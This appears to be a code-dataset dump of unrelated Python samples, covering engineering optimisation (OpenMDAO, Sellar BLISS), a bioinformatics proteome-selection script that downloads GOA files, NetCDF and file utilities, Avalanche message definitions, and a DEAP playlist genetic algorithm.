self.metadata.declare(name_with_fi, desc='Training data for %s' % name_with_fi)
def _train(self):
"""
Override MetaModel _train method to take into account multi-fidelity input data.
"""
if self._nfi == 1:
# shortcut: fallback to base class behaviour immediatly
super(MultiFiMetaModel, self)._train()
return
num_sample = self._nfi * [None]
for name, sz in self._surrogate_input_names:
for fi in range(self._nfi):
name = _get_name_fi(name, fi)
val = self.metadata['train:' + name]
if num_sample[fi] is None:
num_sample[fi] = len(val)
elif len(val) != num_sample[fi]:
msg = "MetaModel: Each variable must have the same number"\
" of training points. Expected {0} but found {1} "\
"points for '{2}'."\
.format(num_sample[fi], len(val), name)
raise RuntimeError(msg)
for name, shape in self._surrogate_output_names:
for fi in range(self._nfi):
name = _get_name_fi(name, fi)
val = self.metadata['train:' + name]
if len(val) != num_sample[fi]:
msg = "MetaModel: Each variable must have the same number" \
" of training points. Expected {0} but found {1} " \
"points for '{2}'." \
.format(num_sample[fi], len(val), name)
raise RuntimeError(msg)
if self.warm_restart:
inputs = []
new_inputs = self._nfi * [None]
num_old_pts = self._nfi * [0]
for fi in range(self._nfi):
num_old_pts[fi] = self._training_input[fi].shape[0]
inputs.append(np.zeros((num_sample[fi] + num_old_pts[fi],
self._input_sizes[fi])))
if num_old_pts[fi] > 0:
inputs[fi][:num_old_pts[fi], :] = self._training_input[fi]
new_inputs[fi] = inputs[fi][num_old_pts[fi]:, :]
else:
inputs = [np.zeros((num_sample[fi], self._input_sizes[fi]))
for fi in range(self._nfi)]
new_inputs = inputs
self._training_input = inputs
# add training data for each input
idx = self._nfi * [0]
for name, sz in self._surrogate_input_names:
for fi in range(self._nfi):
if num_sample[fi] > 0:
name = _get_name_fi(name, fi)
val = self.metadata['train:' + name]
if isinstance(val[0], float):
new_inputs[fi][:, idx[fi]] = val
idx[fi] += 1
else:
for row_idx, v in enumerate(val):
if not isinstance(v, np.ndarray):
v = np.array(v)
new_inputs[fi][row_idx, idx[
fi]:idx[fi] + sz] = v.flat
# add training data for each output
outputs = self._nfi * [None]
new_outputs = self._nfi * [None]
for name, shape in self._surrogate_output_names:
for fi in range(self._nfi):
name_fi = _get_name_fi(name, fi)
if num_sample[fi] > 0:
output_size = np.prod(shape)
if self.warm_restart:
outputs[fi] = np.zeros((num_sample[fi] + num_old_pts[fi],
output_size))
if num_old_pts[fi] > 0:
outputs[fi][:num_old_pts[fi],
:] = self._training_output[name][fi]
self._training_output[name][fi] = outputs[fi]
new_outputs[fi] = outputs[fi][num_old_pts[fi]:, :]
else:
outputs[fi] = np.zeros((num_sample[fi], output_size))
self._training_output[name] = []
self._training_output[name].extend(outputs)
new_outputs = outputs
val = self.metadata['train:' + name_fi]
if isinstance(val[0], float):
new_outputs[fi][:, 0] = val
else:
for row_idx, v in enumerate(val):
if not isinstance(v, np.ndarray):
v = np.array(v)
new_outputs[fi][row_idx, :] = v.flat
surrogate = self._metadata(name).get('surrogate')
if surrogate is not None:
surrogate.train_multifi(self._training_input,
self._training_output[name])
self.train = False
| StarcoderdataPython |
1694801 | from tests import app
@app.route("/error-assert-newline")
def error_assert_newline():
return '<p>Hello</p>\n\n'
| StarcoderdataPython |
38642 | """
Solution of the Sellar analytical problem using classic BLISS.
(Bi-Level Integrated System Synthesis)
MDA solved with a Broyden solver.
Global sensitivity calculated by finite-differencing the MDA-coupled
system. The MDA should be replaced with solution of the GSE to fully
match the original Sobiesky-Agte implementation.
"""
from openmdao.main.api import Assembly, SequentialWorkflow
from openmdao.lib.datatypes.api import Float, Array
from openmdao.lib.differentiators.finite_difference import FiniteDifference
from openmdao.lib.drivers.api import CONMINdriver, BroydenSolver, \
SensitivityDriver, FixedPointIterator
from openmdao.lib.optproblems import sellar
class SellarBLISS(Assembly):
""" Optimization of the Sellar problem using the BLISS algorithm
Disciplines coupled with FixedPointIterator.
"""
z_store = Array([0,0],dtype=Float)
x1_store = Float(0.0)
def configure(self):
""" Creates a new Assembly with this problem
Optimal Design at (1.9776, 0, 0)
Optimal Objective = 3.18339"""
# Disciplines
self.add('dis1', sellar.Discipline1())
self.add('dis2', sellar.Discipline2())
objective = '(dis1.x1)**2 + dis1.z2 + dis1.y1 + exp(-dis2.y2)'
constraint1 = 'dis1.y1 > 3.16'
constraint2 = 'dis2.y2 < 24.0'
# Top level is Fixed-Point Iteration
self.add('driver', FixedPointIterator())
self.driver.add_parameter('dis1.x1', low= 0.0, high=10.0, start=1.0)
self.driver.add_parameter(['dis1.z1','dis2.z1'], low=-10.0, high=10.0, start=5.0)
self.driver.add_parameter(['dis1.z2','dis2.z2'], low= 0.0, high=10.0,start=2.0)
self.driver.add_constraint('x1_store = dis1.x1')
self.driver.add_constraint('z_store[0] = dis1.z1')
self.driver.add_constraint('z_store[1] = dis1.z2')
self.driver.max_iteration = 50
self.driver.tolerance = .001
# Multidisciplinary Analysis
self.add('mda', BroydenSolver())
self.mda.add_parameter('dis1.y2', low=-9.e99, high=9.e99,start=0.0)
self.mda.add_constraint('dis2.y2 = dis1.y2')
self.mda.add_parameter('dis2.y1', low=-9.e99, high=9.e99,start=3.16)
self.mda.add_constraint('dis2.y1 = dis1.y1')
# Discipline 1 Sensitivity Analysis
self.add('sa_dis1', SensitivityDriver())
self.sa_dis1.workflow.add(['dis1'])
self.sa_dis1.add_parameter('dis1.x1', low= 0.0, high=10.0, fd_step=.001)
self.sa_dis1.add_constraint(constraint1)
self.sa_dis1.add_constraint(constraint2)
self.sa_dis1.add_objective(objective, name='obj')
self.sa_dis1.differentiator = FiniteDifference()
self.sa_dis1.default_stepsize = 1.0e-6
# Discipline 2 Sensitivity Analysis
# dis2 has no local parameter, so there is no need to treat it as
# a subsystem.
# System Level Sensitivity Analysis
# Note, we cheat here and run an MDA instead of solving the
# GSE equations. Have to put this on the TODO list.
self.add('ssa', SensitivityDriver())
self.ssa.workflow.add(['mda'])
self.ssa.add_parameter(['dis1.z1','dis2.z1'], low=-10.0, high=10.0)
self.ssa.add_parameter(['dis1.z2','dis2.z2'], low= 0.0, high=10.0)
self.ssa.add_constraint(constraint1)
self.ssa.add_constraint(constraint2)
self.ssa.add_objective(objective, name='obj')
self.ssa.differentiator = FiniteDifference()
self.ssa.default_stepsize = 1.0e-6
# Discipline Optimization
# (Only discipline1 has an optimization input)
self.add('bbopt1', CONMINdriver())
self.bbopt1.add_parameter('x1_store', low=0.0, high=10.0, start=1.0)
self.bbopt1.add_objective('sa_dis1.F[0] + sa_dis1.dF[0][0]*(x1_store-dis1.x1)')
self.bbopt1.add_constraint('sa_dis1.G[0] + sa_dis1.dG[0][0]*(x1_store-dis1.x1) < 0')
#this one is technically unncessary
self.bbopt1.add_constraint('sa_dis1.G[1] + sa_dis1.dG[1][0]*(x1_store-dis1.x1) < 0')
self.bbopt1.add_constraint('(x1_store-dis1.x1)<.5')
self.bbopt1.add_constraint('(x1_store-dis1.x1)>-.5')
self.bbopt1.iprint = 0
self.bbopt1.linobj = True
# Global Optimization
self.add('sysopt', CONMINdriver())
self.sysopt.add_parameter('z_store[0]', low=-10.0, high=10.0, start=5.0)
self.sysopt.add_parameter('z_store[1]', low=0.0, high=10.0, start=2.0)
self.sysopt.add_objective('ssa.F[0]+ ssa.dF[0][0]*(z_store[0]-dis1.z1) + ssa.dF[0][1]*(z_store[1]-dis1.z2)')
self.sysopt.add_constraint('ssa.G[0] + ssa.dG[0][0]*(z_store[0]-dis1.z1) + ssa.dG[0][1]*(z_store[1]-dis1.z2) < 0')
self.sysopt.add_constraint('ssa.G[1] + ssa.dG[1][0]*(z_store[0]-dis1.z1) + ssa.dG[1][1]*(z_store[1]-dis1.z2) < 0')
self.sysopt.add_constraint('z_store[0]-dis1.z1<.5')
self.sysopt.add_constraint('z_store[0]-dis1.z1>-.5')
self.sysopt.add_constraint('z_store[1]-dis1.z2<.5')
self.sysopt.add_constraint('z_store[1]-dis1.z2>-.5')
self.sysopt.iprint = 0
self.sysopt.linobj = True
self.driver.workflow = SequentialWorkflow()
self.driver.workflow.add(['ssa', 'sa_dis1', 'bbopt1', 'sysopt'])
if __name__ == "__main__": # pragma: no cover
import time
import math
prob = SellarBLISS()
prob.name = "top"
tt = time.time()
prob.run()
print "\n"
print "Minimum found at (%f, %f, %f)" % (prob.dis1.z1, \
prob.dis1.z2, \
prob.dis1.x1)
print "Couping vars: %f, %f" % (prob.dis1.y1, prob.dis2.y2)
print "Minimum objective: ", (prob.dis1.x1)**2 + prob.dis1.z2 + prob.dis1.y1 + math.exp(-prob.dis2.y2)
print "Elapsed time: ", time.time()-tt, "seconds" | StarcoderdataPython |
1676302 | <filename>bacteria_selection.py
# coding: utf-8
import pandas as pd
import os
import requests
from GOTool.GeneOntology import GeneOntology
import pickle
DATA_DIRECTORY = '../../../data/bacteria_selection/'
GOA_DIRECTORY = DATA_DIRECTORY + 'selection_goa/'
if os.path.exists(DATA_DIRECTORY+'proteomes_df.pkl'):
proteomes_df = pd.read_pickle(DATA_DIRECTORY+'proteomes_df.pkl')
else:
url = 'https://www.ebi.ac.uk/GOA/proteomes'
url = 'https://www.ebi.ac.uk/inc/drupal/goa/proteomes_release.html'
proteomes_df = pd.read_html(url)[0]
#proteomes_df.columns = proteomes_df.iloc[0]
proteomes_df = proteomes_df.reindex(proteomes_df.index.drop(0),)
proteomes_df['Tax ID'] = proteomes_df['Tax ID'].astype('str')
proteomes_df.to_pickle(DATA_DIRECTORY+'proteomes_df.pkl')
if os.path.exists(DATA_DIRECTORY+'taxonomy_df.pkl'):
taxonomy_df = pd.read_pickle(DATA_DIRECTORY+'taxonomy_df.pkl')
else:
taxonomy_df = pd.read_csv(DATA_DIRECTORY+'proteomes-all.tab', sep='\t') # this is a tab separated file that has to be downloaded from http://www.uniprot.org/proteomes/
taxonomy_df.drop(columns=['Proteome ID', 'Organism'], inplace=True)
taxonomy_df.drop_duplicates(inplace=True)
taxonomy_df['Organism ID'] = taxonomy_df['Organism ID'].astype('str')
taxonomy_df.to_pickle(DATA_DIRECTORY+'taxonomy_df.pkl')
found_taxons=taxonomy_df[taxonomy_df['Organism ID'].isin(proteomes_df['Tax ID'].astype('str'))]
proteomes_df = proteomes_df.merge(found_taxons, left_on='Tax ID', right_on='Organism ID')
proteomes_df = proteomes_df[proteomes_df['Total entries'] == proteomes_df['Protein count']]
proteomes_df['Superkingdom'] = proteomes_df['Taxonomic lineage'].str.partition(',')[0]
bacteria_df = proteomes_df[proteomes_df['Superkingdom'] == 'Bacteria']
print(f'Downloading {bacteria_df.shape[0]} files...')
# ## Download GOAS
# create the selection_goa directory if it doesn't exist
if not os.path.exists(GOA_DIRECTORY):
os.makedirs(GOA_DIRECTORY)
found = 0
not_found = []
for f in proteomes_df[proteomes_df['Superkingdom'] == 'Bacteria']['File']:
if not os.path.isfile(GOA_DIRECTORY+f):
url = 'ftp://ftp.ebi.ac.uk/pub/databases/GO/goa/proteomes/{file}'.format(file=f)
command = 'wget -P '+GOA_DIRECTORY+' "'+ url + '"'
not_found.append(command)
else:
found += 1
print(found, 'proteomes found')
print(len(not_found), 'proteomes not found')
# try to download all not found, but probably by hand is better
for command in not_found:
os.system(command)
# ftp://ftp.ebi.ac.uk/pub/databases/GO/goa/proteomes/4116045.A_yellow_vein_Taiwan_virus-[Taiwan].goa
for f in proteomes_df[(proteomes_df['File'].isin([a.split('/')[-1] for a in not_found])) & (proteomes_df['Superkingdom']=='Bacteria')]['File']:
print('wget "ftp://ftp.ebi.ac.uk/pub/databases/GO/goa/proteomes/'+ f + '"')
bacteria_df.head()
if os.path.exists(DATA_DIRECTORY+'selection_count_df.pkl'):
selection_count_df = pd.read_pickle(DATA_DIRECTORY+'selection_count_df.pkl')
else:
go = GeneOntology(DATA_DIRECTORY + 'go.obo')
go.build_structure()
data = []
counter = 0
for i, organism in bacteria_df.iterrows():
d = {}
go.load_annotation_file(GOA_DIRECTORY+organism['File'], organism['Organism'], GeneOntology.ALL_EVIDENCE_CODES)
go.load_annotation_file(GOA_DIRECTORY+organism['File'], organism['Organism'] + ' exp', GeneOntology.EXPERIMENTAL_EVIDENCE_CODES)
go.up_propagate_annotations(organism['Organism'] + ' exp')
# any evidence code
annotated_terms = [t for t in go.terms.values() if organism['Organism'] in t.annotations]
annotated_genes = set()
for t in annotated_terms:
annotated_genes |= set(t.annotations[organism['Organism']].keys())
d['Tax ID'] = organism['Tax ID']
d['all genes'] = len(annotated_genes)
# experimental annotations
org = organism['Organism'] + ' exp'
annotated_terms = [t for t in go.terms.values() if org in t.annotations]
annotated_genes = set()
annotations_by_domain = {'biological_process': set(), 'cellular_component': set(), 'molecular_function': set()}
terms_by_domain = {'biological_process': set(), 'cellular_component': set(), 'molecular_function': set()}
for t in annotated_terms:
annotated_genes |= set(t.annotations[org].keys())
annotations_by_domain[t.domain] |= set(t.annotations[org].keys())
terms_by_domain[t.domain].add(t)
# terms annotated with 3 genes or more
popular_terms = [t for t in annotated_terms if len(t.annotations[org]) >= 3]
# genes annotated to those terms
popular_genes = set()
popular_by_domain = {'biological_process': set(), 'cellular_component': set(), 'molecular_function': set()}
popular_terms_by_domain = {'biological_process': set(), 'cellular_component': set(),
'molecular_function': set()}
for t in popular_terms:
popular_genes |= set(t.annotations[org].keys())
popular_by_domain[t.domain] |= set(t.annotations[org].keys())
popular_terms_by_domain[t.domain].add(t)
d['exp annotations'] = len(annotated_genes)
d['popular genes'] = len(popular_genes)
d['annotated terms'] = len(annotated_terms)
d['popular terms'] = len(popular_terms)
d['terms bp'] = len(terms_by_domain['biological_process'])
d['terms mf'] = len(terms_by_domain['molecular_function'])
d['terms cc'] = len(terms_by_domain['cellular_component'])
d['pop bp'] = len(popular_terms_by_domain['biological_process'])
d['pop mf'] = len(popular_terms_by_domain['molecular_function'])
d['pop cc'] = len(popular_terms_by_domain['cellular_component'])
data.append(d)
counter += 1
if counter % 1000 == 0:
print((float(counter)/len(bacteria_df['Tax ID'])) * 100.0, '%')
selection_count_df = pd.DataFrame(data)
selection_count_df.to_pickle(DATA_DIRECTORY+'selection_count_df.pkl')
pickle.dump(data, open(os.path.join(DATA_DIRECTORY,'data.pkl'), 'wb'))
selection_df = bacteria_df.merge(selection_count_df, left_on='Tax ID', right_on='Tax ID')
selection_df.to_pickle(DATA_DIRECTORY+'selection_df.pkl')
ontology_tau = 8
annotations_tau = 10
res = selection_df[
(selection_df['exp annotations'] >= annotations_tau) &
(selection_df['pop bp'] >= ontology_tau) &
(selection_df['pop mf'] >= ontology_tau) &
(selection_df['pop cc'] >= ontology_tau)
# (results_is_a_part_of['popular genes'] > 50) &
# (results_is_a_part_of['popular terms'] > 50)
][['Tax ID', 'Organism', 'File','all genes', 'annotated terms',
'exp annotations', 'pop bp', 'pop cc', 'pop mf', 'popular genes',
'popular terms', 'terms bp', 'terms cc', 'terms mf']]
res_untrimmed = selection_df[
(selection_df['exp annotations'] >= annotations_tau) &
(selection_df['pop bp'] >= ontology_tau) &
(selection_df['pop mf'] >= ontology_tau) &
(selection_df['pop cc'] >= ontology_tau)
# (results_is_a_part_of['popular genes'] > 50) &
# (results_is_a_part_of['popular terms'] > 50)
]
res.to_pickle(os.path.join(DATA_DIRECTORY, 'selected_bacteria_df.pkl')) | StarcoderdataPython |
3247894 | # avax-python : Python tools for the exploration of the Avalanche AVAX network.
#
# Find tutorials and use cases at https://crypto.bi
"""
Copyright (C) 2021 - crypto.bi
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
---
Help support this Open Source project!
Donations address: X-avax1qr6yzjykcjmeflztsgv6y88dl0xnlel3chs3r4
Thank you!
"""
# --#--#--
from .Op import Op
from .Field import Field
class Messages:
"""
Network message structures.
Canonical version: avalanchego/network/commands.go
"""
__msg_structure = {
# Handshake:
Op.GetVersion: [],
Op.Version: [Field.NetworkID, Field.NodeID, Field.MyTime, Field.IP, Field.VersionStr],
Op.GetPeerList: [],
Op.PeerList: [Field.Peers],
Op.Ping: [],
Op.Pong: [],
# Bootstrapping:
Op.GetAcceptedFrontier: [Field.ChainID, Field.RequestID, Field.Deadline],
Op.AcceptedFrontier: [Field.ChainID, Field.RequestID, Field.ContainerIDs],
Op.GetAccepted: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerIDs],
Op.Accepted: [Field.ChainID, Field.RequestID, Field.ContainerIDs],
Op.GetAncestors: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerID],
Op.MultiPut: [Field.ChainID, Field.RequestID, Field.MultiContainerBytes],
# Consensus:
Op.Get: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerID],
Op.Put: [Field.ChainID, Field.RequestID, Field.ContainerID, Field.ContainerBytes],
Op.PushQuery: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerID, Field.ContainerBytes],
Op.PullQuery: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerID],
Op.Chits: [Field.ChainID, Field.RequestID, Field.ContainerIDs],
# Signature
Op.SignedVersion: [Field.NetworkID, Field.NodeID, Field.MyTime, Field.IP, Field.VersionStr, Field.VersionTime, Field.SigBytes],
Op.SignedPeerList: [Field.SignedPeers],
}
@classmethod
def get(cls, op):
if op in cls.__msg_structure:
return cls.__msg_structure.get(op)
raise LookupError(f"Message structure not found for Op {op}")
| StarcoderdataPython |
75631 | <reponame>Kieran-Bacon/Expert-Opinions-Vegetation-Change<gh_stars>0
"""
Implements the ModelFile class for use with NetCDF files.
"""
import warnings
import numpy as np
from netCDF4 import Dataset
from ExpertRep.abstract.ClimateEvalAPI import ModelFile
from ExpertRep.tools.geojson_gen import dict_to_geojson
class NetCDFFile(ModelFile):
def __init__(self, netcdf_file: str, initialise: bool = True):
super(NetCDFFile, self).__init__(netcdf_file=netcdf_file)
if initialise:
dataset = Dataset(netcdf_file, "r", format="NETCDF4")
self.numpy_arrays = np.array(dataset.variables['frac'])
self.lat = np.array(dataset.variables['latitude'])
self.lon = np.array(dataset.variables["longitude"])
dataset.close()
else:
self.numpy_arrays = None
self.lat = None
self.lon = None
self.sparse = None
def get_numpy_arrays(self, layer: int = -1, resize_to: tuple = None, remove_nan: bool = True) -> np.array:
if resize_to is not None:
raise NotImplementedError("Not yet implemented")
if layer == -1:
arrays = self.numpy_arrays
else:
arrays = self.numpy_arrays[layer]
if remove_nan:
nan_mask = np.isnan(arrays)
arrays = np.array(arrays, copy=True)
arrays[nan_mask] = 0
return arrays
def get_info(self) -> dict:
raise NotImplementedError("Not yet implemented")
def get_geojson(self, layer_id: int) -> str:
self.sparse = [dict() for _ in range(self.numpy_arrays.shape[0])]
with warnings.catch_warnings():
# The warning produced by undefined behaviour on self.numpy_arrays > 1e-5
# for NAN values is dealt with by the previous clause.
warnings.filterwarnings("ignore", category=RuntimeWarning)
vals = np.where(np.logical_and(np.logical_not(np.isnan(self.numpy_arrays)), self.numpy_arrays > 1e-5))
for layer, i, j in zip(*vals):
self.sparse[layer][(self.lat[i], self.lon[j])] = self.numpy_arrays[layer, i, j]
return list(map(dict_to_geojson, self.sparse))[layer_id]
def save(self, file_path: str) -> None:
with open(file_path, "wb") as file_obj:
np.save(file_obj, np.array([self.netcdf_file_path]))
np.save(file_obj, self.sparse)
np.save(file_obj, self.numpy_arrays)
np.save(file_obj, self.lat)
np.save(file_obj, self.lon)
def __hash__(self):
return hash((self.numpy_arrays.data.tobytes(), self.lat.tobytes(), self.lon.tobytes()))
def __eq__(self, other):
return (np.allclose(self.get_numpy_arrays(), other.get_numpy_arrays(), equal_nan=True) and
np.allclose(self.lat, other.lat, equal_nan=True) and
np.allclose(self.lon, other.lon, equal_nan=True))
@classmethod
def load(cls, file_path: str) -> "ModelFile":
with open(file_path, "rb") as file_obj:
str_array = np.load(file_obj)
instance = cls(str(str_array[0]), initialise=False)
instance.sparse = np.load(file_obj)
numpy_arrays = np.load(file_obj)
instance.numpy_arrays = numpy_arrays
instance.lat = np.load(file_obj)
instance.lon = np.load(file_obj)
return instance
| StarcoderdataPython |
1660872 | from .settings import *
PROJECT_APPS = [
'users.apps.UsersConfig',
]
INSTALLED_APPS += [] + PROJECT_APPS
AUTH_USER_MODEL = 'users.User'
| StarcoderdataPython |
3288343 | import errno, os, inspect
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
return path
def touch(file_path):
open(file_path, 'a').close()
def to_unix_path(path):
return path.replace('\\', '/')
def create_increment_folder( folder_prefix, parent_folder ):
parent_folder = to_unix_path(parent_folder);
folders = [name for name in os.listdir(parent_folder) if os.path.isdir(os.path.join(parent_folder, name))]
matching_folders_numbers = [];
for i in range(0,len(folders)):
folder_name = folders[i];
contains_pattern = folder_prefix in folder_name
if(contains_pattern):
split_result = int(folder_name.replace(folder_prefix,''));
matching_folders_numbers.append(split_result);
matching_folders_numbers = sorted(matching_folders_numbers);
if( matching_folders_numbers ):
highest_folder = matching_folders_numbers[-1];
else:
highest_folder = 0;
new_folder_idx=highest_folder+1;
new_folder_path = os.path.join(parent_folder,folder_prefix+str(new_folder_idx));
mkdir_p(new_folder_path);
return (new_folder_path,new_folder_idx)
def create_increment_file( file_prefix, parent_folder,ext='',dont_touch=True):
mkdir_p(parent_folder)
parent_folder = to_unix_path(parent_folder)
files = [name for name in os.listdir(parent_folder) if os.path.isfile(os.path.join(parent_folder, name))]
matching_files_numbers = [];
matching_files = []
for filename in files:
filestem=os.path.splitext(filename)[0]
contains_pattern = file_prefix in filestem
if(contains_pattern):
try:
split_result = int(filestem.replace(file_prefix,''));
except Exception as err:
split_result = 0
matching_files_numbers.append(split_result);
matching_files.append(filename)
matching_files_numbers = sorted(matching_files_numbers);
if ext=='':
ext=os.path.splitext(matching_files[0])[-1]
if( matching_files_numbers ):
highest_file = matching_files_numbers[-1]
else:
highest_file = 0
new_file_idx=highest_file+1;
new_file_path = os.path.join(parent_folder,file_prefix+str(new_file_idx)+'.'+ext)
if(not dont_touch):
touch(new_file_path)
return (new_file_path,new_file_idx)
def get_python_func_tempdir():
mycaller=inspect.getouterframes(inspect.currentframe(), 2)[1][3]
out = os.path.join('/tmp','python_'+mycaller)
mkdir_p(out)
tmpdir = create_increment_folder(get_simple_date(), out);
return (out, tmpdir)
| StarcoderdataPython |
3247083 | from django.contrib import admin
from .models import DeferredAction
admin.site.register(DeferredAction,
list_display=('token', 'valid_until', 'confirmed', 'is_expired'))
| StarcoderdataPython |
3207601 | class Student:
def __init__(self, std):
self.count = std
def go(self):
for i in range(self.count):
print(i)
return
if __name__ == '__main__':
Student(5).go()
| StarcoderdataPython |
1697793 | <gh_stars>10-100
# Load prepared track metadata and features
REQUIRED_GENRE = None #'Electronic'
import pickle
with open('tracks_metadata.pkl', 'rb') as f:
tracks_metadata = pickle.load(f)
with open('track_features.pkl', 'rb') as f:
track_features = pickle.load(f)
all_tracks = list(tracks_metadata.keys())
def computeTrackDuration(track):
duration = tracks_metadata[track]['track_duration']
if len(duration.split(':')) == 2:
(mins, secs) = duration.split(':')
hours = 0
elif len(duration.split(':')) == 3:
(hours, mins, secs) = duration.split(':')
else:
secs = duration
mins = 0
hours = 0
return (float(hours) * 60.0 + float(mins) + float(secs)/60.0)
# remove tracks that have missing keys
removed_tracks = []
for track in all_tracks:
if 'genres' not in track_features[track] or 'bpm' not in track_features[track] or 'beats_loudness' not in track_features[track] or 'loudness' not in track_features[track] or 'dissonance' not in track_features[track] or 'genres' not in track_features[track] or 'tonal_key' not in track_features[track] or 'interest' not in track_features[track] or 'listens' not in track_features[track] or 'favorites' not in track_features[track]:
del tracks_metadata[track]
del track_features[track]
removed_tracks.append(track)
continue
duration = computeTrackDuration(track)
if duration < 3 or duration > 10:
del tracks_metadata[track]
del track_features[track]
removed_tracks.append(track)
continue
if REQUIRED_GENRE is not None:
if REQUIRED_GENRE not in track_features[track]['genres']:
missing_required_genre = True
del tracks_metadata[track]
del track_features[track]
removed_tracks.append(track)
all_tracks = list(set(all_tracks)-set(removed_tracks))
import numpy
import random
import sys
from deap import algorithms
from deap import base
from deap import creator
from deap import tools
# To evaluate an individual (a playlist), we'll compute a variety of scores:
#
# - Total playlist time - desired playlist time (e.g., 1hr), absolute value difference
# - Minimize
# - Entropy of genres: sum across every possible genre g: - percent-of-songs-with-genre * log(percent-of-songs-with-genre)
# - Minimize, i.e., have a playlist with mostly the same genre
# - Entropy of tonal keys
# - Minimize
# - Difference in beats-per-minute in successive songs (absolute sum)
# - Minimize
# - Absolute difference of largest beats loudness - smallest beats loudness
# - Minimize
# - Absolute difference of largest loudness - smallest loudness
# - Minimize
# - Absolute difference of largest dissonance - smallest dissonance
# - Minimize
# - Average interest
# - Maximize
# - Average listens
# - Maximize
# - Average favorites
# - Maximize
import math
from collections import Counter
def calcEntropy(individual, field, multivalue):
valcounts = Counter()
for track in individual:
if multivalue:
valcounts.update(track_features[track][field])
else:
valcounts.update([track_features[track][field]])
sum = 0.0
for val in valcounts.elements():
p = float(valcounts[val])/float(len(individual))
if p > 0:
sum -= p * math.log(p)
return sum
def evalPlaylist(individual, desired_play_time):
# difference in actual play time and desired play time (in minutes)
play_time = 0.0
for track in individual:
play_time += computeTrackDuration(track)
diff_play_time = abs(play_time - desired_play_time)
genre_entropy = calcEntropy(individual, 'genres', True)
tonal_keys_entropy = calcEntropy(individual, 'tonal_key', False)
sum_diff_bpm = 0.0
for i in iter(range(1, len(individual))):
sum_diff_bpm += abs(track_features[individual[i-1]]['bpm'] -
track_features[individual[i]]['bpm'])
min_beats_loudness = sys.float_info.max
max_beats_loudness = 0.0
min_loudness = sys.float_info.max
max_loudness = 0.0
min_dissonance = sys.float_info.max
max_dissonance = 0.0
for track in individual:
if min_beats_loudness > track_features[track]['beats_loudness']:
min_beats_loudness = track_features[track]['beats_loudness']
if max_beats_loudness < track_features[track]['beats_loudness']:
max_beats_loudness = track_features[track]['beats_loudness']
if min_loudness > track_features[track]['loudness']:
min_loudness = track_features[track]['loudness']
if max_loudness < track_features[track]['loudness']:
max_loudness = track_features[track]['loudness']
if min_dissonance > track_features[track]['dissonance']:
min_dissonance = track_features[track]['dissonance']
if max_dissonance < track_features[track]['dissonance']:
max_dissonance = track_features[track]['dissonance']
diff_beats_loudness = max_beats_loudness - min_beats_loudness
diff_loudness = max_loudness - min_loudness
diff_dissonance = max_dissonance - min_dissonance
sum_interest = 0
sum_listens = 0
sum_favorites = 0
for track in individual:
sum_interest += track_features[track]['interest']
sum_listens += track_features[track]['listens']
sum_favorites += track_features[track]['favorites']
avg_interest = sum_interest / float(len(individual))
avg_listens = sum_listens / float(len(individual))
avg_favorites = sum_favorites / float(len(individual))
return (diff_play_time, genre_entropy, tonal_keys_entropy,
sum_diff_bpm, diff_beats_loudness, diff_loudness, diff_dissonance,
avg_interest, avg_listens, avg_favorites)
# an invalid playlist has <3 songs or repeated songs
def validPlaylist(individual):
return len(individual) >= 3 and len(set(individual)) == len(individual)
creator.create("FitnessMulti", base.Fitness,
weights=(-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, 1.0, 1.0, 1.0))
creator.create("Individual", list, fitness=creator.FitnessMulti)
# adds or removes a track not already in the playlist, at a random location
def mutatePlaylist(individual):
if random.random() > 0.5:
# add a track
track = random.choice(all_tracks)
if track not in individual:
idx = random.choice(range(0, len(individual)))
individual = individual[:idx] + [track] + individual[idx:]
elif len(individual) > 5:
# delete a track
del individual[random.choice(range(0, len(individual)))]
return creator.Individual(individual),
NUM_SONGS = 20
toolbox = base.Toolbox()
toolbox.register("tracks", random.sample, all_tracks, NUM_SONGS)
toolbox.register("individual", tools.initIterate, creator.Individual, toolbox.tracks)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
toolbox.register("evaluate", evalPlaylist, desired_play_time=120)
invalidPlaylistScore = (sys.float_info.max, sys.float_info.max, sys.float_info.max,
sys.float_info.max, sys.float_info.max, sys.float_info.max,
sys.float_info.max, 0.0, 0.0, 0.0)
toolbox.decorate("evaluate", tools.DeltaPenalty(validPlaylist, invalidPlaylistScore))
toolbox.register("mate", tools.cxOnePoint)
toolbox.register("mutate", mutatePlaylist)
toolbox.register("select", tools.selNSGA2)
# Simulation parameters:
# Number of generations
NGEN = 5000
# The number of individuals to select for the next generation (eliminate bad ones).
MU = 500
# The number of children to produce at each generation.
LAMBDA = 50
# The probability that an offspring is produced by crossover.
CXPB = 0.5
# The probability that an offspring is produced by mutation.
MUTPB = 0.5
# Initial population
pop = toolbox.population(n=MU)
# The top playlist is the one that is best on all scores in the fitness
hof = tools.ParetoFront()
# fitness is composed of:
# 0: diff_play_time, 1: genre_entropy, 2: tonal_keys_entropy,
# 3: sum_diff_bpm, 4: diff_beats_loudness, 5: diff_loudness, 6: diff_dissonance,
# 7: avg_interest, 8: avg_listens, 9: avg_favorites
# compute some statistics as the simulation proceeds
diff_play_time_stats = tools.Statistics(key=lambda ind: ind.fitness.values[0])
